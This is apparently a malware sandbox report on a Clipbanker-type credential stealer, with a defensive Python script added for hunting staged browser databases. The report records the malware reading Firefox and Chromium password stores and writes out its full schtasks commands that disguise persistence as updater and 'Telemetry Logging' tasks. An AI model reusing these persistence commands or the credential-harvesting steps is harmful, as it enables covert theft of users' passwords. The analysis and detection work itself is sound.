Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: C:\Users\user\Desktop\file.exe Code function: String function: 06D66140 appears 58 times
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000002.4443680764.0000000001125000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
Source: file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000000.1990364908.0000000001125000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
Source: file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/32@5/4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D29130 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_06D29130
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000003.2113965338.000000000647E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.000000000647E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, da`;H
Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.2122632450.0000000006540000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124050663.000000000173B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112112086.0000000006483000.00000004.00000020.00020000.00000000.sdmp, HYMDMNDHbpvCLogin Data.0.dr, yDHoBcv6VALYLogin Data For Account.0.dr, KNCS9xAjcy97Login Data.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
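The SQL schema strings above (autofill, logins, password_notes) and the dropped files named HYMDMNDHbpvCLogin Data, yDHoBcv6VALYLogin Data For Account and KNCS9xAjcy97Login Data show the sample copying Chromium profile databases to disk under a random prefix, alongside reads of the Firefox profiles.ini and signons.sqlite. The following hunting script is an added example for this report, not sandbox output and not the stealer's code: it walks a directory for files that look like such staged copies, confirms they carry the SQLite header and lists their tables. The prefix length range, the extra database names (Cookies, History, logins.json, key4.db) and the sample staging directory it builds are this example's own assumptions; the password_notes schema it reuses is the one quoted in the report.

```python
"""Hunt for browser credential databases staged under a directory (added example)."""
import os
import re
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"
# Per-profile databases a Chromium-based browser keeps (names seen in the report plus common ones).
CHROMIUM_DBS = ("Login Data", "Login Data For Account", "Web Data", "Cookies", "History")
# Firefox credential stores (signons.sqlite is the legacy name the sample reads).
FIREFOX_DBS = ("signons.sqlite", "logins.json", "key4.db")
# <random alphanumeric prefix><original Chromium database name>, nothing else (length range assumed)
_PREFIXED = re.compile(r"^[A-Za-z0-9]{8,16}(" + "|".join(re.escape(n) for n in CHROMIUM_DBS) + r")$")


def is_sqlite(path):
    """True when the file starts with the 16-byte SQLite 3 header."""
    try:
        with open(path, "rb") as fh:
            return fh.read(16) == SQLITE_MAGIC
    except OSError:
        return False


def table_names(path):
    """User tables of a SQLite database (internal sqlite_* tables skipped)."""
    con = sqlite3.connect(path)
    try:
        rows = con.execute("SELECT name FROM sqlite_master WHERE type='table' "
                           "AND name NOT LIKE 'sqlite_%' ORDER BY name").fetchall()
    finally:
        con.close()
    return [r[0] for r in rows]


def find_staged_browser_dbs(root):
    """Walk `root` and report files that look like copied browser databases."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            m = _PREFIXED.match(name)
            if not m and name not in FIREFOX_DBS:
                continue
            path = os.path.join(dirpath, name)
            rec = {"path": path, "browser_file": m.group(1) if m else name,
                   "sqlite": is_sqlite(path), "tables": []}
            if rec["sqlite"]:
                rec["tables"] = table_names(path)
            hits.append(rec)
    return sorted(hits, key=lambda r: r["path"])


def build_sample_dir():
    """Constructed staging directory mimicking the dropped-file names in the report."""
    root = tempfile.mkdtemp(prefix="staged_")
    con = sqlite3.connect(os.path.join(root, "HYMDMNDHbpvCLogin Data"))
    con.executescript("""
        CREATE TABLE logins (id INTEGER PRIMARY KEY, origin_url VARCHAR NOT NULL,
                             username_value VARCHAR, password_value BLOB);
        CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT,
            parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE
            DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB,
            date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        INSERT INTO logins VALUES (1, 'https://example.test', 'alice', X'00');
    """)
    con.commit()
    con.close()
    con = sqlite3.connect(os.path.join(root, "GNGpmTFam5reWeb Data"))
    con.executescript("CREATE TABLE autofill (name VARCHAR, value VARCHAR, "
                      "value_lower VARCHAR, date_created INTEGER);")
    con.commit()
    con.close()
    # Decoy with a random name but no database suffix: must not be reported.
    with open(os.path.join(root, "trixy1UB98D2D2zeo"), "wb") as fh:
        fh.write(b"not a database")
    return root


if __name__ == "__main__":
    for hit in find_staged_browser_dbs(build_sample_dir()):
        print(hit["browser_file"], hit["sqlite"], hit["tables"], hit["path"])
```

Run against a live host, point find_staged_browser_dbs at %LOCALAPPDATA%\Temp and %TEMP%-like locations; a copy of "Login Data" outside a browser profile directory is the staging artifact to look for, and the table list tells you whether the copy is the password store (logins) or the autofill store (autofill).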
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe" Jump to behavior
